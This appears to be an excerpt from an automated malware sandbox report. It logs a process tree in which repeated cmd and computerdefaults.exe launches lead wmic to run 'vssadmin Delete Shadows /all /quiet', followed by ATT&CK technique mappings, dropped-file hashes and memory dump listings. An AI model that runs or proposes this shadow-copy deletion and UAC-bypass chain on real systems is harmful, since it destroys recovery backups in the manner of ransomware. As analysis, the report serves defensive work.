PID:2876
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5724
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5508

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5828

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5872

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5380

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3044
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5900
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5060

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5324
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1524
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4724

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:872

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3416

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2884

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5516
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3608
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5968

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5840
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5852
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5716

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1352

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3600

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5340

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4652
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3668
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3484

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3044
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5176
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4432

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5356

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5772

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4964

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5396
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5132
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5508

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5108
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5712
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5020

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5740

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5964

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5264
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4124
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4924

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3388

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5176
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2912
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5044

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5880

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4772

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5620

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5372
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5252
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:6032

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:6060
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5916
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:6120

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3976

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5964

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Privilege Escalation

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c2d9eeb3fdd75834f0ac3f9767de8d6f

SHA1
4d16a7e82190f8490a00008bd53d85fb92e379b0

SHA256
1e5efb5f1d78a4cc269cb116307e9d767fc5ad8a18e6cf95c81c61d7b1da5c66

SHA512
d92f995f9e096ecc0a7b8b4aca336aeef0e7b919fe7fe008169f0b87da84d018971ba5728141557d42a0fc562a25191bd85e0d7354c401b09e8b62cdc44b6dcd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e55832d7cd7e868a2c087c4c73678018

SHA1
ed7a2f6d6437e907218ffba9128802eaf414a0eb

SHA256
a4d7777b980ec53de3a70aca8fb25b77e9b53187e7d2f0fa1a729ee9a35da574

SHA512
897fdebf1a9269a1bf1e3a791f6ee9ab7c24c9d75eeff65ac9599764e1c8585784e1837ba5321d90af0b004af121b2206081a6fb1b1ad571a0051ee33d3f5c5f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
16de1b08c82d6b90c0a495b1231d43c8

SHA1
25b9edcd7dce742bd1ef1cad4d6a620810a48a2f

SHA256
e1348d2f41ffc6117a635adf2a22698d0c1fc85aba9b2373bc302cc43cfe2028

SHA512
04cfedf669b082518bd165a6bc9ce708e54e90ecb8d0fd0230e129238762aaebf14741338248d756f80534b0ef13af1218ddbb9ea1dd4cbb4a2c312a97d1cc48

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
d7bab65154ef20523ff7874290a2d11e

SHA1
0dff590ad322106767c1fbd0fcb7bb6622543068

SHA256
797d27ad25154547cd8ea0c7970431a2a616468a05761f957157aa1d810c0bc1

SHA512
1afc448096e2f5b5fd36df269e262c7445c8860cb427ff674a47674e0e180e365cd6184511b29e5ed56002cf11fdbac726249d903d579725e576ddf03db45914

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\e9de5e88-a8a7-490e-9358-3417eddccc3b.tmp

Filesize
10KB

MD5
0386ce8a1c27a11d2cb3d8f9af83acc1

SHA1
6cdba84d7b667fc8d41f86bb21a4e242632e2a96

SHA256
a0d2ae84581df70571f678021014078a7dc677824c7a700f559dcb2ca2156c6e

SHA512
240c4c87b95e97be84dfd8cf94762bb34ed66802491a411390c06ecf462fdb5318fe3ff3ed6be9b63792bda5efb39784360d2f1ab0659c4e4b24c8bf85b80a4b

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310091\1728589176

Filesize
2KB

MD5
02cac560f48cf5b79440fb1b1c799f3b

SHA1
4a9380aeba74760a0d6d03d145697c5a935ba3fb

SHA256
971b79c455c15b4b80e21527185cd0e82dab97155db46dab0a84a9838218db62

SHA512
d0dc86faef948a08c0d38ac54dcb489fcb524f5a3b44e1bb577f0c417311b783001c1231d13d4742870fb1ab981049a8150f2fc9432ec86d13064aaf3b942c5e

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\1728589180

Filesize
4KB

MD5
39e73e15e8551ae2fb69b1830e433d2e

SHA1
d5ce5dc3b9633cdf6ee9560b705df984e5aa6923

SHA256
d9ca055d4c319a6a715549fe78b1e05f518e599ba7b4bb532f3aa8ec3ae0748d

SHA512
98bff82e778e1545d27691561ded98bb91fce8732cda7e95f77707ce5165ac4ca637345ad09098fe3e85ef8741b8ad20517a2dc830d58064d212259f7b0f4114

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338388\8a0e7380004b439db51b53e50fa1c4c1_1

Filesize
2KB

MD5
913492a212b04490bca2cc2789fff9ba

SHA1
a6a5e5808742ce0dce71db4d3401b3d4b61ce467

SHA256
78d5ce0621ec5037d1b7528fc57f4966b9123b5ab5801ad94493d55e66570141

SHA512
56b81c0c77bbf8525a7895bc10ef8add77edd8ca509206e833f9b1cd9de0ac862ead07de7ec4c4bfde673721eecab8a89da1c35669b48960c0974fe76fe12631

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133730627978020762.txt

Filesize
75KB

MD5
d90863c507e5215fa77b0c40eb5b701c

SHA1
30ff572bbf6324c72303a355d4c40ec4694cbd5b

SHA256
d9849b88d53a62959d13abed7db794ea12c0b0aa41dcbddb71cab628317aae30

SHA512
978941d5fa82604e8ba0c295c534ff26ec15555ed1ce3b7ce843379e61ad0cbf15be7c8f0e513e303c77fa043ab8239471ddf89fbfbf675881e12d74fb5078cb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms

Filesize
8KB

MD5
505817e5031455a754e5e134ec30caef

SHA1
0e1506c8cfc3224395ae4d524efd389dba7bb42d

SHA256
e4a5307ab28e8a1e442ea6d9f6bd905ecf86602bf4753af40aad2d83b2bd6e98

SHA512
790559927e559b01c9f44203e875a0d9834fd100b794de9f9cc8f9a4cb56ded934c2e2b9414557f1725fe303df5597e1643c46133692397b3fd0af1ba6c371c9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\9b9cdc69c1c24e2b.automaticDestinations-ms

Filesize
3KB

MD5
2c3c469cb53604cd789df2df8c66e861

SHA1
fae7b4dff4182f067007b6129bce9faa1c24a583

SHA256
23d77424a9d565d856bbf604a3ac14fb2edeb11b99f654fc667cdd02f17fa453

SHA512
8fb6a4852c4123c616235f6bcb564058f36c0df3110835c827075c3640371bfbfef8f859d3d3a6051b52dfbdfaf8037a21713c8c20f14bf4878d8ba7a1f9c9ca

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

Filesize
8KB

MD5
7d5adce99ca7d30863f571ccff4b3ab2

SHA1
8582d9e4fa150298076c8ec8a58b8bec26700598

SHA256
1c57c152dace3ba8c993c7710463c532421f6e8aceb094e935f6f2831827b4f0

SHA512
5dc80142f2e5f18c257dc6a345ba3c2ed110523cc5be4c0d37a0cdf5e10343db57efbfec0c2dbe2521ae8329f1d4fadd9181c8f3ced16bed832dd3e3b5bdbc85

Download Submit
C:\Users\Admin\Pictures\readme.txt

Filesize
1KB

MD5
1875100dc18fea577f757b600ea61c36

SHA1
6410207b7286c973f7f8d53986a131ac88fb915c

SHA256
7c4761ab67b4c07934244e037115603ff93afa71c3200b1ee76bf29b61383228

SHA512
6beba425f6b5da84f599811e67df269ac477d14b578cf347fa4f5ba445b510b58745feaa2b381ef84229a9813310a4550f004bebe57ce9174e708bea205adf37

Download Submit
C:\Users\Public\readme.txt

Filesize
332B

MD5
718777534403cdcf89b5d9b5f4b2f141

SHA1
3f49f57f3c25d60fef6d5593c9eb5a69b74a7b29

SHA256
619de8a85d1beac2e0b2c9cef08f56fc70859f6f4dd0f763d2175bdac746b0cb

SHA512
8018fdbec663355db212827869eb7744f615f58db96e9a12da248f40979d28d8057bcab945381e43cb346e0b3ded14743efd8b47727ca98e32e430b6519d7440

Download Submit
memory/2596-11-0x00000228E9B30000-0x00000228E9B35000-memory.dmp

Filesize
20KB

Download
memory/3764-52-0x0000017FA9C60000-0x0000017FA9C68000-memory.dmp

Filesize
32KB

Download
memory/3764-391-0x0000017FA9CD0000-0x0000017FA9CD1000-memory.dmp

Filesize
4KB

Download
memory/3764-390-0x0000017FAA000000-0x0000017FAA008000-memory.dmp

Filesize
32KB

Download
memory/4124-4-0x000001C3A8DE0000-0x000001C3A8DE1000-memory.dmp

Filesize
4KB

Download
memory/4124-7-0x000001C3A8E40000-0x000001C3A8E41000-memory.dmp

Filesize
4KB

Download
memory/4124-8-0x000001C3A8E50000-0x000001C3A8E51000-memory.dmp

Filesize
4KB

Download
memory/4124-0-0x000001C3A8F80000-0x000001C3A97F2000-memory.dmp

Filesize
8.4MB

Download
memory/4124-9-0x000001C3A8E60000-0x000001C3A8E61000-memory.dmp

Filesize
4KB

Download
memory/4124-6-0x000001C3A8E00000-0x000001C3A8E01000-memory.dmp

Filesize
4KB

Download
memory/4124-12-0x000001C3A8DA0000-0x000001C3A8DA1000-memory.dmp

Filesize
4KB

Download
memory/4124-5-0x000001C3A8DF0000-0x000001C3A8DF1000-memory.dmp

Filesize
4KB

Download
memory/4124-2-0x000001C3A8DC0000-0x000001C3A8DC1000-memory.dmp

Filesize
4KB

Download
memory/4124-1-0x000001C3A8DB0000-0x000001C3A8DB1000-memory.dmp

Filesize
4KB

Download
memory/4124-10-0x000001C3A8E70000-0x000001C3A8E71000-memory.dmp

Filesize
4KB

Download
memory/4124-3-0x000001C3A8DD0000-0x000001C3A8DD1000-memory.dmp

Filesize
4KB

Download